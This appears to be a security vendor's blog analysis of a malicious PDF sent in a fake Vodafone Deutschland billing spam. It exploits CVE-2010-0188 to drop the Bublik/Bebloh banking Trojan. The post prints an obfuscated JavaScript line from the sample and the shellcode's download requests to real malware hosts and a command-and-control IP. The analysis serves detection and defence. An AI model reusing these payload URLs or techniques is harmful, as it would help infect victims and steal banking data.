An Analysis of a Fake Vodafone Bill PDF File

We haven't come across many malicious PDF files recently inour spam traps, so when we found this message, ostensibly from VodafoneDeutschland, we naturally took a closer look.

In this example, the cyber crooks are targeting VodafoneDeutschland customers by spamming a fake billing statement. The message claimsto be from Vodafone-OnlineRechnung@vodafone.com.The spam may look harmless at first, especially given the links in the messagepoint to the real Vodafone.de website. But the attached PDF file is indeeddangerous.

Fig1SpamEmail

I tested the attached PDF file against PDFScore (a tool developed by our colleague Rodrigo Montoro a.k.a Sp0oKeR) and it showed a number of suspect elements inside the file. You may check out Rodrigo's presentation about "Scoring PDF Structure To Detect Malicious Files" at SOURCE 2012 in Seattle: http://www.youtube.com/watch?v=qNlZiB2wnEM

Fig2PDFScore
Detected as malicious by PDFScore.

The malicious PDF file was crafted to exploit the Libtiffvulnerability (CVE-2010-0188) in Adobe Reader 9.3 and earlier. The exploit crashes Adobe Reader and executes the attacker'smalicious code.

The PDF uses two layers of JavaScript obfuscation beforetriggering the exploit and executing its payload. The first JavaScript was embeddedinside this compressed XFA (XML Forms Architecture) form.

CompressedJavascriptx

The embedded data uses ZLIB compression, sodecompressing was fairly easy. After scraping the compressed data out of thePDF file and some quick Python scripting, the malicious JavaScript lurking in the PDFfile is revealed.

Fig4DecompressedJS

Here's the code which is easier on the eyes:

Fig5CodeBeautify

In the JavaScript code, the variable "a" references to the tag "/Keywords"

a=/*ebwfweng`*/t["ke"+"ywo"+"rds"].split('|')[0]["substr"](13);

The string inside "/Keyword" will be deobfuscated inside a FORloop and afterwards will be executed using JavaScript's eval() function. The image below shows the "/Keywords" tag containing astring of obfuscated JavaScript code. The code's job is to heap spray theshellcode to Adobe Reader's heap.

HeapSprayJSCOde

And here's the full HEXdecoded shellcode, notice a couple of URLs below:

ShellcodeDecoded

The shellcode's ultimate intention is to download a coupleof malicious file from the internet.

GET /stuff/corduroyshop/corduroyshop.exe Host:rocketmou.se (173.236.241.197:80)GET /mapa/images/mapa.exeHost: coachplay.co.il (173.236.217.119:80)

Both files are exactly the same executable from differentURLs, perhaps for redundancy reasons. The malware is known as Bublik or Bebloh – a banking Trojan. https://www.virustotal.com/file/ffee98ae73c293f9fc4b2ab6076c64ad84256546cc97cb8eb572201d4a27c0d6/analysis/

The Bublik/Bebloh Trojan's payload connected to a commandand control server and gathered email addresses in the infected machine byquerying the WAB (Windows Address Book) registry. It disabled the Windows LUA(Least Privileged User Account) to run all applications (including the malwareitself) as Administrator. It also changed the default browser to InternetExplorer in order to monitor the user's internet browsing habits and onlinebanking.

Here's a TCP stream capture of the Trojan communicating to itscommand & control server at Trisi[.]net (94.249.209.21)

Fig9PCAP
The malware's command and control communication

TheWHOIS info of the Trojan's command & control server domain name shows that itwas just created recently last 15th of November, hmmm interesting!

Whois

Inconclusion, sometimes it's quite hard to distinguish legitimate and maliciousemail and this spam campaign is an example. But if you're a Vodafone customer in Germany who regularly receives monthly bill statement through email, there is a high chance of being sucked in and opening the attached PDF file.

Because this malicious PDF file makes use of JavaScript toexecute the exploit, the best thing to be protected is to disable JavaScript inyour PDF reader and use the latest version. In Adobe Reader, you can disable JavaScriptthrough Edit->Preference then uncheck Enable Acrobat JavaScript.

DisableJSAdobe

Fortunately,if you have the latest Adobe Reader XI installed in your computer, the exploitinside the malicious PDF file will be rendered useless. Better yet, use an alternative PDF reader.

Customers of Trustwave MailMarshal Secure Email Gateway are protected against this threat.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.